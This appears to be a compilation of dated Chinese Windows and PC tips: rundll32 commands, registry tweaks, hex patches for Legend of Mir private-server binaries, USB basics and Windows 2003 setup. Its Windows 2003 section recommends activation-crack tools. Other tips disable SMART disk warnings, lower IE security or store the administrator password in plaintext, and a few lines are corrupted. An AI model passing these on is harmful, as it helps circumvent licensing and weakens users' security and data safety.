命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
功能: 显示“显示属性－外观”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
功能: 显示显示“显示属性－属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
功能: 显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 同样是显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,SHformatDrive
功能: 显示格式化软碟对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
功能: 显示“控制面板－游戏控制器－一般”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
功能: 显示“控制面板－游戏控制器－进阶”选项视窗。
命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档)
功能: 列印HTML文档。
命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
功能: 显示Microsoft Exchange一般选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
功能: 显示“控制面板－滑鼠” 选项 。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
功能: 显示 “控制面板－键盘属性－速度”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
功能: 显示 “控制面板－键盘属性－语言”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
功能: 显示Windows“印表机”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 显示Windows“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
功能: 显示“控制面板－输入法属性－输入法”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
功能: 执行“添加新调制解调器”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
功能: 显示“控制面板－多媒体属性－音频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
功能: 显示“控制面板－多媒体属性－视频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
功能: 显示“控制面板－多媒体属性－MIDI”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
功能: 显示“控制面板－多媒体属性－CD音乐”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
功能: 显示“控制面板－多媒体属性－设备”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
功能: 显示“控制面板－声音”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
功能: 显示“控制面板－网路”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
功能: 显示ODBC32资料管理选项视窗。
命令列: rundll32.exe shell32.dll,OpenAs_RunDLL

功能: 显示指定档案(drive:path ilename)的“打开方式”对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
功能: 显示“控制面板－密码”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
功能: 显示“控制面板－电源管理属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL
PrintersFolder
功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL
main.cpl @2)
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
功能: 显示“控制面板－区域设置属性－区域设置”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
功能: 显示“控制面板－区域设置属性－数字”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
功能: 显示“控制面板－区域设置属性－货币”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
功能: 显示“控制面板－区域设置属性－时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
功能: 显示“控制面板－区域设置属性－日期”选项视窗。
命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]
功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
功能: 显示“控制面板－系统属性－传统”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
功能: 显示“控制面板－系统属性－设备管理器”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
功能: 显示“控制面板－系统属性－硬体配置档案”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
功能: 显示“控制面板－系统属性－性能”属性视窗。
命令列: rundll32.exe user.exe,restartwindows
功能: 强行关闭所有程式并重启机器。
命令列: rundll32.exe user.exe,exitwindows
功能: 强行关闭所有程式并关机。
命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
功能: 显示“拨号属性”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
功能: 显示“桌面主旨”选项面板
当然，不止是VisualBasic，象Delphi.VisualC＋＋等其他程式设计语言也可以通
过呼叫外部命令的方法来使用Rundll的这些功能，具体方法这里就不再详细叙述
了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果！

以上内容取自《程式设计技术》

<关机快捷方式>
(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>
(2). 在<指令行>键入 rundll.exe user.exe,exitwindows
(3). 在<选择快捷方式 的名称>键入<关闭Window>或你想要的名称 -> 按<完成>

<重新启动快捷方式>
(1). 重复以上 (1)
(2). 在<指令行>键入 rundll.exe user.exe,restartwindow***ec
(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按<完成>
RUN - > cmd 或者command


SF减少M2卡机的方法

《一键清理系统垃圾》

SF减少M2卡机的方法

如果说M2Server.exe是主板,那么RunGate.exe就是中央处理器cpu!
RunGate.exe默认等待数据传输时间为10秒钟,当等待多个ID的数据而无响应时,7200端口
在10秒内就会报错,RunGate会暂时停止工作,造成部分或全部玩家短时间内掉线,没有掉线
的玩家就会狂卡一阵!
另外,卡,主要是网络问题,其次才是服务器的问题!有时候,才上了几十个人就感到卡,而有时
侯上了几百人都不卡,还有一种情况是莫个地区的玩家感到卡,而其它地区非常流畅,就是这
个道理!
所以减少默认等待数据传输时间,就能减少卡机现象!(本来我想说:杜绝)
这样,就能及时切断或结束那些网络不畅的数据传输,减少7200端口报错现象,减少服务器卡
的机率!至于网络卡的问题,我们无能为力!,还是留给那些病毒专家去解决吧!
你若要转载请注明来自[大众传奇],您若要来测试,请来[大众私服].一个内置60个好私服的
登录器下载地址 http://www.dzwb.com/dlq.exe
此修改法已在[大众私服]运行一月有余,自我感觉良好,现说明如下:
用UltraEdit打开RunGate.exe
1) 查找00050a50h这一行中的:
00E8664AFBFFB9102700008B150CAA45(默认10秒钟)
[大众私服]改为5秒钟:
00E8664AFBFFB9881300008B150CAA45
2) 查找00050b70h这一行中的:
E83E49FBFF68102700(默认10秒钟)
[大众私服]改为5秒钟:
E83E49FBFF68881300

另一贴,对您或许也有些用,一起发吧!
修改M2Serve存挡时间,减少重启回档现象![大众传奇]
M2Serve默认10分钟保存一次信息,服务器重启或意外关机,总会有几分钟时间的信息无法保存,这就是回档!减少默认存档间隔,就能减少发生重启回挡现象!另外,还有一个问题,在还没有保存信息之前,RunGate所运行和转换的所有玩家信息暂时会存储在哪呢?应该在内存中,而内存中的信息又是用CUP读取并保存到mir.db里!因此,我认为,减少M2Serve默认存档间隔,有利于运行RunGate,能减少卡机现象,节约内存,降低cup占用率!
修改方法如下:
用UltraEdit打开M2Serve
查找000b1570h这一行中的:
FC2B42183DC02709007667E82C51F5FF
其中的C02709为默认的10分钟

改为每5分钟保存一次,用下面的替换:
FC2B42183DE09304007667E82C51F5FF

改为每3分钟保存一次,用下面的替换:
FC2B42183D20BF02007667E82C51F5FF

改为每1分钟保存一次,用下面的替换:
FC2B42183D60EA00007667E82C51F5FF


Shell使用技巧两则

《一键清理系统垃圾》

Shell使用技巧两则

    Linux中的Shell即解释命令的外壳程序，能使用Shell熟练地编制程序对更好的使用Linu是大有便利的。这里我就介绍其中的两个小技巧（以C Shell为例）：
    1.重复一条语句（repeat）
    传统格式为：
    repeat num command
    num代表循环次数，command代表所要执行命令。然而我们可以使用一种方法欺骗C Shell，使repeat命令可以执行复杂的命令。我们可以把要执行的复杂命令写入一个文件中，然后给该文件设置可执行位，在repeat的循环体中反复执行该文件；
    2.在使用重定向符“>＆”时，虽然可以把标准错误写入文件，但是这样做会使标准输出与标准错误混在一起，不易区分，使用：
    （yourcommand >＆ stdout.file）>＆ stderr.file
    就可以把标准输出写到文件stdout.file中，而把标准错误写到stderr.file文件中，这样就实现了两者的分离。


SMART与菜鸟刻盘

《一键清理系统垃圾》

SMART与菜鸟刻盘

IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项，手动设定硬盘的参数。必须输入柱面数（Cyls），磁头数（Heads），写预补偿（Precomp），磁头着陆区（Landz），每柱面扇区数（Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。

最近，我们网吧有些电脑，自检完成后，提示：硬盘的S.M.A.R.T bad,backup and replace ,press F4 resume(小弟的英文有点不好，写了大概的意思），经过我的研究把COMS中的硬盘选项设为user后，再把S.M.A.R.T选项给禁止，再启动就不会出现这个问题了

S.M.A.R.T. for Hard Disks(硬盘的智能检测技术）
    此项允许您激活硬盘的S.M.A.R.T（自我监控、分析、报告技术）能力。S.MA.R.T应用程序是来监控硬盘的状态预测硬盘失败。可以提前将数据从硬盘上移动到安全的地方。设置为：Enabled, Disabled。

[原创]菜鸟看过来 用ghost刻盘.从来都不会出错!!!
g盘我相认大家都很熟了.
呵呵.
可是我在看一些网管g盘的时候.
还要很认真的看一下跳线是否正确.
接上去看又看一下硬盘线是否接对..
....

这样不是很郁闷...

方法.

在母盘做好后.
在c盘建一个文件夹..名字自已取好..比如1

ghost的时候.
只管把硬盘接上去不要去先不要看什么主从盘..不管什么跳线...
进去后dos模式.
dir/w 一下.
列出当前c盘目录下的文件名.
看一下是否有1名字的
有代表此时接的盘是主盘那么后面就不用我说了..
没有代表此时接第一系统是从盘c盘系统...g的时候盘对盘倒过来就是用2g1.....

很简单的方法..哦..
呵呵...


USB技术白皮书

《一键清理系统垃圾》

USB技术白皮书

通用串行总线（Universal Serial Bus）是用于将适用USB的外围设备连接到主机的外部总线结构，其主要是用在中速和低速的外设。USB是由COMPAQ、DIGITAL、IBM、INTEL、MICROSOFT、NEC以及Northern Telecom七家公司共同开发的一种新的外设连接技术.这一技术将最终解决对串行设备和并行设备如何与计算机相连的争论，大大简化计算机与外设的连接过程。USB是通过PCI总线和PC的内部系统数据线连接，实现数据的传送。USB同时又是一种通信协议，他支持主系统(host)和USB的外围设备(device)之间的数据传送。
USB的优点有以下几条：
1.USB为所有的USB外设提供了单一的、易于操作的标准的连接类型。这样一来就简化了USB外设的设计，同时也简化了用户在判断哪个插头对应哪个插槽时的任务，实现了单一的数据通用接口。
2.USB排除了各个设备象鼠标、调制解调器、键盘和打印机设备对去系统资源的需求，因而减少了硬件的复杂性和对端口的占用，整个的USB的系统只有一个端口和一个中断，节省了系统资源。
3.USB支持热插拔(hot plug)，也就是说在不关PC的情况下可以安全的插上和断开USB设备，动态的加载驱动程序。其他普通的外围连接标准，如SCSI设备等必须在关掉主机的情况下才能增加或移走外围设备。
4.USB支持PNP。当插入USB设备的时候，计算机系统检测该外设并且通过自动的加载相关的驱动程序来对该设备进行配置，并使其正常工作。
5.USB在设备供电方面提供了灵活性。USB直接连接到Hub或者是连接到Host的设备可以通过USB电缆供电，也可以通过电池或者其它的电力设备来供电，或使用两种供电方式的组合.并且支持节约能源的挂机和唤醒模式。
6.USB提供全速12Mbps的速率和低速1.5Mbps的速率来适应各种不同类型的外设。
7.针对不能处理突然发生的非连续传送的设备，如音频和视频设备，USB可以保证其固定带宽。
8.为了适应各种不同类型外围设备的要求，USB提供了四种不同的数据传送类型。
9.USB使得多个外围设备可以跟主机通信。
USB的目的:1,使用方便 2,可以提供实时的数据给PC 3,端口的灵活扩展性
USB标准可以www.usb.org/developer中找到，并且你还可以在该站点找到另外的一个USB的测试工具:usbcomp.exe,它包含一个usbcheck的工具可以检测到设备是否一些USB的高层次的要求。同时它还有一个usbcheck的工具可以检测HID(human interface device)的设备。而Win98还有一个"Ignore hubs"(Memphis only)的检测窗口。在W2K DDK中包含的一个USBView的工具可以看出系统中所有的USB总线以及USB总线上的所有的设备。
USB的基本特性
每一个设备(device)会有一个或者多个的逻辑连接点在里面,每个连接点叫endpoint.每个endpoint有四种数据传送方式:控制(Control)方式传送;同步(isochronous)方式传送;中断(interrupt)方式传送;大量(bulk)传送.但是所有的endpoint0都被用来传送配置和控制信息。
在host和设备的endpoint之间的连接叫作管道“pipe",endpoint0叫做缺省(default pipe)。
对于同样性质的一组的endpoint的组合叫做接口(interface),如果一个设备包含不止一个的接口就可以称之为复合设备(composite device)。
同样的道理,对于同样的类型的接口的组合可以称之为“配置"(configuration)。但是每次只能有一个配置是可用的,而一旦该配置激活,里面的接口和endpoint就都同时可以使用。
host从设备发过来的描述字(descriptors)中来判断用的是哪个配置,哪个接口等等,而这些的描述字通常是在endpoint0中传送。
传输方式
在USB的数据传送的方式下,有四种的传输方式:控制(Control)同步(isochronous)中断(interrupt)大量(bulk)。如果你是从硬件开始来设计整个的系统,你还要正确选择传送的方式,而作为一个驱动程序的书写者,就只需要弄清楚他是采用的什么工作方式就行了。
通常所有的传送方式下的主动权都在PC边,也就是host边。
·控制(Control)方式传送：控制传送是双向传送，数据量通常较小。USB系统软件用来主要进行查询、配置和给USB设备发送通用的命令。控制传送方式可以包括8、16、32和64字节的数据，这依赖于设备和传输速度。控制传输典型地用在主计算机和USB外设之间的端点(Endpoint)0之间的传输，但是指定供应商的控制传输可能用到其它的端点。
·同步(isochronous)方式传送：同步传输提供了确定的带宽和间隔时间（latency)。它被用于时间严格并具有较强容错性的流数据传输，或者用于要求恒定的数据传送率的即时应用中。例如执行即时通话的网络电话应用时，使用同步传输模式是很好的选择。同步数据要求确定的带宽值和确定的最大传送次数。对于同步传送来说，即时的数据传递比完美的精度和数据的完整性更重要一些。
·中断(interrupt)方式传送：中断方式传输主要用于定时查询设备是否有中断数据要传送。设备的端点模式器的结构决定了它的查询频率，从1到255ms之间。这种传输方式典型的应用在少量的分散的、不可预测数据的传输。键盘、操纵杆和鼠标就属于这一类型。中断方式传送是单向的并且对于host来说只有输入的方式。
·大量(bulk)传送：主要应用在数据大量传送传送和接受数据上，同时又没有带宽和间隔时间要求的情况下，要求保证传输。打印机和扫描仪属于这种类型。这种类型的设备适合于传输非常慢和大量被延迟的传输，可以等到所有其它类型的数据的传送完成之后再传送和接收数据。
还有很多有关USB的接口规范，以及低层的硬件接口编程，内容是非常烦杂，这里就略过，在这里只是想大家在理论的层面上对USB有一个认识，所以文章难度相对较高，适合对这方面感兴趣的高手浏览。


Win9x下系统资源的解释和分析

《一键清理系统垃圾》

Win9x下系统资源的解释和分析

以下文章内容只针对Windows 9x系列，不能用于WinNT/2000/XP及后续NT核心的Windows版本

一、系统资源

Windows里面有一个不可忽略的问题：系统资源，但系统资源的定义是什么？恐怕知道的人不是很多。当应用程序在Windows里面运行时，Windows必须实时“跟踪”该应用程序的运行，并保留与之相关的许多信息，如：按钮、光标、菜单的位置和位图、窗口的状态等，这些信息由Windows保留在一种叫做堆的内存块中，堆的英文为Heap。简单的说，堆是采用特殊机制管理的内存块。由Windows的一个系统内核(User.exe)管理的堆叫做User资源堆，由另一个系统内核(GDI.exe)管理的堆叫做GDI资源堆。User资源堆和GDI资源堆合称为系统资源堆，习惯上就叫做系统资源。微软将Windows的系统资源（堆）分为五个堆，其中User资源堆为三个，而GDI资源堆为两个。三个User资源堆分别是：16位的用户堆（User Heap 64KB），32位的窗口堆（Windows Heap 2MB），32位的用户菜单堆（User Menu Heap 2MB）。两个GDI资源堆分别是16位的GDI堆（GDI Heap 64KB）和32位的GDI堆（GDI Heap 2MB）。从这里的系统资源的分类和大小我们应该明白，无论你的CPU是P4还是486，内存是8M还是1G，所有的Windows的用户都拥有同样大小的系统资源（堆），用户不能够自己增加或减少系统资源的大小，这是由操作系统规定的，与硬件的档次没有任何关系。Windows的User资源堆和GDI资源堆的可用空间称为可用User资源和可用GDI资源，Windows中以百分数的形式表示，我们可以利用Windows中的一个小工具------资源状况查询当前系统的可用资源。注意：典型安装模式是不会安装这个工具的，你可以在添加/删除里面的Windows组件里面选择安装。

二、系统资源为什么会减少

当一个应用程序在Windows 中被加载时，Windows 自动地将可用User 资源堆和可用GDI 资源堆中的一部分空间分配给它，而当应用程序退出时，这部分空间也应该由Windows 收回以交给别的应用程序使用。但实际上几乎所有的Windows用户都发现: 一个应用程序加载前和退出后可用系统资源的值是不相等的，而且随着应用程序的不断加载和退出， 随着Windows 使用时间的增加，资源状况显示的可用系统资源也在不断减少。

微软的正式解释是:

* 系统初始化 Windows 在启动时要进行系统初始化（System Initialization）的过程，Windows 的系统初始化属于延时初始化。例如，Windows 在启动时只初始化当前使用的字体，以后当应用程序要使用到尚未被初始化的字体时， Windows才会初始化该字体，这种由应用程序根据需要提出要求而发生的初始化服务就是所谓的延时初始化。对于属于延时初始化的服务，Windows 还采用了特别的管理方式，当向Windows提出延时初始化服务的应用程序退出后，与延时初始化服务相关的系统资源（例如上面提到的与新字体有关的系统资源）不会随着应用程序的退出而马上释放，这是造成应用程序加载前和退出后可用系统资源的值不相等的原因之一。Windows 不马上收回与延时初始化服务，是为了防止该应用程序或别的应用程序以后又向系统提出同样的初始化服务而导致系统不断重复服务而浪费时间。例如对于加载同一应用程序，第二次加载的时间会明显少于第一次，显然延时初始化功不可没。

* 兼容性 在Windows 中运行的所有16 位应用程序共享相同的地址空间，当其中某一个16 位应用程序正常退出或出现错误而被关闭时， Windows 9X 并不马上收回这个应用程序所占用的系统资源，这也是造成一个应用程序加载前和退出后可用系统资源的值不相等的又一个原因。只有当所有的16 位应用程序全部退出后，Windows 才能安全地收回被这些程序占用的系统资源，此时可用系统资源才会恢复到原值。之所以这样设计， 主要是考虑到要让Windows9x能够继续运行大量的16位应用程序。

*资源泄漏 按上述解释,可用的系统资源不断减少是正常的,这是Windows的设计目的之一。但是许多程序员在实际工作中发现在其他的一些情况下Windows也会不能够完全收回系统资源，这就导致了可用资源的不断减少，程序员称这种现象为资源泄漏。微软开始并未承认，但是随着证据的不断增加，最后还是不得不承认了其中的一些下现象的存在。造成资源泄漏这种现象的原因很多：使用Ctrl+Alt+Del强制关闭一个应用程序、程序上设计不完善等。

最后，Windows中不存在一个有着实际意义的系统资源，可用的系统资源一定等于可用USER资源和可用GDI资源中较小的那一个。Windows的可用User资源是根据所有User资源堆中可用空间最小的那个资源堆计算出来的，可用的GDI资源的计算方法也是一样的。为了保持与16位应用程序的兼容性，Windows 9x的大量数据都要使用16位的64KB的资源堆，这导致总是16位64KB的资源堆首先被大量消耗，因此在Windows 9X中，限制系统资源使用的是64KB的资源堆而不是2MB的资源堆。Windows本身也要占用系统资源，绝对没有那个用户的可用系统资源是100%，保持更多的系统资源的方法是不要同时运行大型程序，而且最好保持在10%以上可用。如果可用系统资源不足，最有效的方法是重新启动。另外，不要把系统资源和CPU可用资源相混淆，2者是不同的。


Win9x注册表小技巧

《一键清理系统垃圾》

Win9x注册表小技巧

    Win9x中的注册表，是一个包含并管理着系统各种软、硬件信息的数据库，它的存在为我们提供了一些用控制面板和其他视窗界面无法实现的对系统的配置和管理功能。下面介绍几则通过修改注册表来改善操作系统功能的小技巧。
    1．让Windows自动刷新文件夹　当我们在资源管理器中复制、删除、新建了某些文件夹和文件之后，有时候需要手工刷新才能看到我们在更改文件夹或文件之后的结果，这显然是有点麻烦。有没有办法让Windows自动刷新文件夹呢？具体做法是：先启动注册表编辑器（点击“开始”→“运行”，执行regedit命令），找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Update分支，将它下面的一个名为UpdateMode的键的键值改为00，重新启动Windows以后，资源管理器就会变得“勤快”了，在你增、删文件夹或文件之后，它会自动将文件夹刷新。
    2．减少“新建”菜单中的项目　现在有的软件真是越来越自作主张了，只要你把它装进你Windows，它就会在你的系统里加点东西。当你在“资源管理器”或者是“我的电脑”里点鼠标右键的“新建”菜单时，就会看到那些无政府主义者把你的新建菜单弄得又臭又长。让我们先打开注册表编辑器，找“编辑”菜单中的“查找”，在其对话框中输入Shellnew，然后再点“查找下一个”，每找到一个，就看它下面的键名是不是我们要找的那些讨厌文件，如果是就把Shellnew都删掉，直到找到所有的讨厌鬼为止。
    3．消除Windows的欢迎屏幕　我想大多数人已经厌倦了Micosoft Windows的欢迎屏幕。那么，我们完全可以将它从已经很漫长的启动过程中清理出去。方法很简单，我们打开注册表编辑器的“编辑”→“查找”，去找一个叫“welcome.exe”的分支，将它删除掉，你就可以如愿以偿了。
    4．缩短应用程序出错的等待时间　我想每一个人都会碰到在打开一个应用程序时该程序死掉、出错或是没有响应的情况，而Win9x这时会一厢情愿地用一段时间等待它的响应，然后我们才能关闭它，这样会让我们很心烦的。打开注册表编辑器，找到HKEY_CURRENT_USER\Contorl Panel\desktop分支下面新建一个串值，将其键名改为“HungAppTimeOut”，并将其键值设置为1500，以后在程序出错的时候你就会感觉好多了。
    5．给Win98改个名字　在注册表编辑器中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu－rrentVersion分支，有一个名字为Version的项，将其键值改成你想要的名字，比如“小胖的酒吧”。另外该分支的其他有关注册信息的键值也可以修改。然后打开“资源管理器”→“帮助”→“关于Windows98”，看看吧！
    最后，再告诉你一个小窍门。你知道有什么办法能不用重新启动Windows就使我们刚才修改过的注册表生效吗？在修改完注册表之后，点击“开始”→“关闭系统”，待“关闭Windows”菜单弹出以后，按下Ctrl＋Alt＋Del键，这时会弹出另一个关闭程序的窗口，在其中选择Explorer，单击“结束任务”，等待对话框出来以后选择“结束任务”，一切就OK了。


Windows9X注册表揭密

《一键清理系统垃圾》

Windows9X注册表揭密

这是我近期使用98的经验教训的总结,早有同学催我写出来,今日才得空闲,与大家共享, 敬请指教.

随着PC机的普及，Microsoft公司的Windows 9x及Windows NT系列操作系统也逐渐为大 家所熟悉。原先在Windows 3.X中那些繁复的ini文件，为一个注册表所代替。注册表隐藏了复杂的系统设置，但同时也隐藏了缺陷。常遇到的一个情况就是装了些不知名的小软件，但是发现不是很合意，想 删又删不掉，或者是删不干净，这是最让玩家头疼的。象从网上down下的“桌面王”一类 屏保，良莠不齐，删不 干净时“控制面板/添加删除程序”中老是有些怪模怪样的字符，甚不雅观。而且注册表 是启动时就常驻内存，膨胀的注册表对内存消耗很大。

其实注册表也不是什么非常深奥的东西，只是个小型层次数据库。微软把以前Windows 3.X里那些乱七八糟的ini文件做进了进来，加了一层包装而已，骨子里还是那些东西。据 说这是最让开发者得意的产品，但也是最受用户责难的东西^_^。
以Windows 98为例，运行regedit，看看里面到底有些什么东西。
HKEY-CLASSES_BOOT里是些系统响应的设置。其中*底下的东西我现在也没有研究出来， 还是不动为好。接下来是各种扩展名文件的类型和默认打开方式，其中只有少部分可以在 “资源管理器/文件类型”里看得见，还是有些用处的，比如asp文件在photoshop和 personal web server中都有定义，哪个先装就随哪个，先装photoshop的话一点就启photoshop了，吭哧 吭哧老半天也看不了，可以在这里把asp一项删除，或者更改为自己想要的属性。下面一 溜都是注册的ActiveX控件，如果有什么非正常的错误，可以到这里来研究一下。
HKEY-CURRENT_USER下是当前用户的一些设置。AppEvents是事件响应的设置，Control Panel 是桌面的设置，Display是显示器的设置。最常更改的是Software，里面是所装的 各种软件，一般格式corp name/ software name。有什么不干净的软件一般这里都可以看得见马脚了。但是要求对系统比较熟悉，才可以动手，不然很容易坏事。注意有些软件是系统自带支持的，象netscape,没有装里面 也有一个主键，不可以删掉喔...
在HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Policies 下面可以大做些文章，这里列出些小技巧,仅对当前用户有效:
Explorer\NoSetFolders=1 DWORD 禁止“控制面板及打印机”
Explorer\NoSetTaskbar=1 DWORD 禁止“任务栏属性”
Explorer\NoDesktop=1 DWORD 隐藏桌面所有图标
Explorer\Nodrivers=ff,ff,ff 二进制 隐藏“我的电脑”中所有驱动器
Explorer\NoFind=1 DWORD 禁止“查找”
Explorer\NoRun=1 DWORD 禁止“运行”
System\DisableRegistryTools=1 DWORD 禁止修改注册表!!!
System\NoDispCPL=1 DWORD 禁止“活动桌面”
WinOldApp\Disabled=1 DWORD 禁止MS-DOS方式
WinOldApp\NoRealMode=1 DWORD 禁止重起至DOS方式
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\USERShe
llFolders下是当前用户的设置路径，可以改到你喜欢的目录下。
HKEY_LOCAL_MACHINE下的是本机设置，其中Software\
Microsoft\Windows\Currentversion\Winlogon主键下的LegalNoticeCaption(字符串)内 容为登录前的对话框标题，LegalNoticeText(字符串)为对话框的内容，要想出现对话框 ，可设置为友好登录（建议），Network\Logon\MustBeValidated=1 (DWORD)可防止非法用户登录时键入“ESC”进入。Software\Microsoft\Windows\Current version\Uninstall主键下就是“添加/删除程序”所对应的各项目，下来都知道该怎么做 了吧。
如果实在不行，可以从头到尾，用菜单中的“编辑/查找...”功能搜索可疑的关键字， 相信会是“法网恢恢，疏而不漏”的。用这样的办法，我把“飞扬”硬是加进了IE4的默 认邮件。
好了，祝大家好运。对了，在进行改动之前，最好把注册表备份“导出注册表文件”， 以防万一。至于Windows 95/97 ，大致差不到哪里去，NT可能多一些东西，希望先进与大 家交流。


Windows 9x也可远程控制

《一键清理系统垃圾》

Windows 9x也可远程控制

    在校园网的维护中，如何方便地实现对服务器的远程控制是我们网管们非常关心的话题。利用Windows XP和Windows Server 2003 自带的远程桌面连接功能可以很好地解决这个问题，但是在校园中大量存在的客户机中装载的均是Windows 9x/2000系统，并未提供远程桌面的连接程序，因此无法使用其方便地对服务器进行远程控制。其实，只要搜索Windows XP下远程桌面的连接程序和所需的DLL文件，然后将它粘贴至Windows 9x/2000客户机中就可以实现远程控制。方法如下：

    在安装了Windows XP的电脑中打开“搜索”项，选择“所有文件和文件夹”，在“关键词”框中输入远程连接程序的主文件“Mstsc.exe,Mstscax.dll”，搜索找到后将这两个文件粘贴至Windows 9x/2000客户机中，运行Mstsc.exe程序即可。


Windows 2003 激活和优化

《一键清理系统垃圾》

Windows 2003 激活和优化

1.windows server 2003 3790版本识别
RTM=release to manufacture （公开发行批量生产）是给硬件制造商的版本！是送去压盘的,不是拿去卖的。
OEM=Original Equipment Manufacturer只能全新安装， 和RTM差不多，只是称呼不同而已。
RTL=retail（零售）正式零售版,可以升级或者全新安装。
VLK=Volume License大量授权版，又称为企业版。
2.windows server 2003 3790版的激活
在正式版算号器没有出来之前，现在流行的激活方式有以下几种：
（1）Reset5.02，在安全模式下运行即可激活，把时间调整为2008年都没有问题，一切使用正常。可以升级。
缺点：激活程序被彻底屏蔽，表现为运行msoobe /a没有任何显示，并且在服务中有一项reset5，开机会自动运行此服务，C:\WINDOWS\system32\srvany.exe，此程序应该是reset5添加入系统的。

（2）俄罗斯破解，记得在xp时代，只要把setupreg.hiv在安装前替换，然后电话激活就可以达到完美的激活境界，可在2003下，这样子做之后，当前显示已激活，可如果你调整了时间再开机又会显示要激活，甚至是不能使用。估计次次问题关键还是在那个setupreg.hiv文件。

（3）在论坛上有人贴出了一个Winxpactivation.exe的文件，号称可以激活，实际上这个还是假激活，暂时屏蔽了激活程序，是不能够修改时间的。

（4）用替换法做出来的伪VLK，安装使用都没有问题，只是不能升级。VLK是替换英文版的8个文件.但是SN已经被微软封掉了.所以不能升级。

结论：推荐大家用reset5.02激活！

3.禁用配置服务器向导
禁止“配置你的服务器”（Manage Your Server）向导的出现：在控制面板（Control Panel） -> 管理员工具（Administrative Tools ）-> 管理你的服务器（Manage Your Server）运行它，然后在窗口的左下角复选“

登录时不要显示该页”（Don''t display this page at logon）。

4.禁用Internet Explorer Enhanced Security 和禁止安全询问框的出现在IE工具选项中自定义设置IE的安全级别。在”安全“（Security）选项卡上拉动滚动条把Internet区域安全设置为”中“（Medium）或“中低”。自定义设置中将有关的选择“提示”修改为选择“禁止”或“启用”。

5.禁用关机事件跟踪
开始 -> 运行 -> gpedit.msc -> Computer configuration -> Administrative Templates -> System -> Display shutdown event tracker -> 设置为 Disable。如果是中文版，则：开始 -> 运行 -> gpedit.msc->计算机配置 -> 管理模板 -> 系统 -> 显示关机事件跟踪 -> 禁用。

6. 禁用开机 CTRL+ALT+DEL和实现自动登陆
方法1：打开注册表(运行->“Regedit”)，再打开:
HKEY_LOCAL_MACHIN|SOFTWARE|MicroSoft|Windows NT|CurrentVersion |Winlogon段，在此中按右键，新建二个字符串段，AutoAdminLogon=“1”，DefaultPassword=“为超级用户Administrator所设置的Password”。 注意，一定要为Administrator设置一个密码，否则不能实现自启动。 然后，重新启动Windows即可实现自动登录。
方法2：管理工具 -> Local Security Settings（本地安全策略） -> 本地策略 -> 安全选项 -> interactive logon: Do not require CTRL+ALT+DEL，启用之。

方法3（自动登陆）：使用Windows XP的Tweak UI来实现Server 2003自动登陆。下载：Tweak UI http://www.ssite.org/uppic/sun_pic/...003/tweakui.exe下载后直接执行tweakui.exe 在左边的面板中选择Logon -> Autologon -> 在右边勾写），点击下面的Set Password，输入用户名的密码，然后点击OK。

7.启用硬件和DirectX加速
